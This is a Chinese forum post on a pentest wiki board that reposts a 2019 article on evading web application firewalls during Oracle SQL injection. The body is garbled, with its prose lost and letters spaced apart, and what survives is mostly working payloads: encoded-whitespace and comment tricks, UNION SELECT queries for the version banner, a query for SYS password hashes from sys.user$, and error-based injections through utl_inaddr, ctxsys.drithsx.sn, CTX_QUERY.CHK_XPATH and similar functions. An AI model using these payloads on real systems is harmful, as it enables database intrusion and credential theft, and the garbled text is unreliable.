设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 数据库 [892] 2019-01-21_WAFBypass数据库特性(Oracle探索篇) ...
返回列表 发新帖
查看: 8|回复: 0

[892] 2019-01-21_WAFBypass数据库特性(Oracle探索篇)

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 7 天前 | 显示全部楼层 |阅读模式
2019-01-21_WAFBypass数据库特性(Oracle探索篇) W A F   B y p a s s O r a c l e   B y p a s s   B y p a s s   2 0 1 9 - 0 1 - 2 1   # W A F   , 9 0 x 0 1   W A F O r a c l e % 0 0 S E L E C T   b a n n e r   F R O M   v $ v e r s i o n   w h e r e   r o w n u m = 1 M y s q l / M S s q l % 0 0 O r a c l e W A F 0 x 0 2   5       S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1 u n i o n s e l e c t 1 , u s e r ( ) f r o m a d m i n u n i o n 1 ) O r a c l e   % 0 0     % 0 9   % 0 a     % 0 b   % 0 c     % 0 d     % 2 0 2 ) / * * / 3 ) % 2 e     .       u n i o n s e l e c t 1 ) O r a c l e   % 0 0     % 0 9   % 0 a     % 0 b   % 0 c     % 0 d     % 2 0 2 ) / * * / s e l e c t 1 ) O r a c l e   % 0 0     % 0 9   % 0 a     % 0 b   % 0 c     % 0 d     % 2 0 2 ) / * * / 3 ) % 2 b     +
% 2 d       - % a d s e l e c t   *   f r o m   e m p   w h e r e   m g r = 7 7 8 2       u n i o n   s e l e c t + N U L L , ( S E L E C T   b a n n e r   F R O M   v $ v e r s i o n   w h e r e   r o w n u m = 1 ) , N U L L , N U L L , N U L L , N U L L , N U L L , N U L L   F R O M   D U A L f r o m 1 ) O r a c l e   % 0 0     % 0 9   % 0 a     % 0 b   % 0 c     % 0 d     % 2 0 2 ) / * * / f r o m 1 ) O r a c l e   % 0 0     % 0 9   % 0 a     % 0 b   % 0 c     % 0 d     % 2 0 2 ) / * * / 0 x 0 3   S E L E C T   b a n n e r   F R O M   v $ v e r s i o n   w h e r e   r o w n u m = 1       / / s e l e c t   u s e r   f r o m   d u a l   w h e r e   r o w n u m = 1                     / / s e l e c t   p a s s w o r d   f r o m   s y s . u s e r $   w h e r e   r o w n u m = 1   a n d   n a m e = ' S Y S '     / / S Y S S E L E C T   n a m e   F R O M   v $ d a t a b a s e                                       / / s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1       / / T i p s o r a c l e   | |   i d = 1   a n d   1 = 2   u n i o n   s e l e c t   ( c h r ( 9 4 ) | | c h r ( 9 4 ) | | c h r ( 3 3 ) | | ( S E L E C T   b a n n e r   F R O M   v $ v e r s i o n   w h e r e r o w n u m = 1 ) | | c h r ( 3 3 ) | | c h r ( 9 4 ) | | c h r ( 9 4 ) )   f r o m   d u a l - - ? i d = 1   A N D   1 = u t l _ i n a d d r . g e t _ h o s t _ a d d r e s s ( ( S E L E C T   n a m e   F R O M   v $ d a t a b a s e ) )     / / ? i d = 1   a n d   1 = c t x s y s . d r i t h s x . s n ( 1 , ( s e l e c t   U T L _ I N A D D R . g e t _ h o s t _ a d d r e s s   f r o m   d u a l   w h e r e   r o w n u m = 1 ) ) - -   / / i p ? i d = 1   a n d   1 =   C T X S Y S . C T X _ Q U E R Y . C H K _ X P A T H ( ( s e l e c t   b a n n e r   f r o m   v $ v e r s i o n   w h e r e   r o w n u m = 1 ) , ' a ' , ' b ' ) - - ? i d = 1   O r   1 = O R D S Y S . O R D _ D I C O M . G E T M A P P I N G X P A T H ( ( s e l e c t   b a n n e r   f r o m   v $ v e r s i o n   w h e r e   r o w n u m = 1 ) , ' a ' , ' b ' ) - - ? i d = 1   a n d   ( s e l e c t   d b m s _ x d b _ v e r s i o n . u n c h e c k o u t ( ( s e l e c t   u s e r   f r o m   d u a l ) )   f r o m   d u a l )   i s   n o t   n u l l ? i d = 1   a n d   1 = c t x s y s . d r i t h s x . s n ( 1 , ( s e l e c t   u s e r   f r o m   d u a l ) ) - - 0 x 0 4   E N D   O r a c l e 便 B y p a s s
A b o u t   M e W A F
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 10:37 , Processed in 0.144615 second(s), 29 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表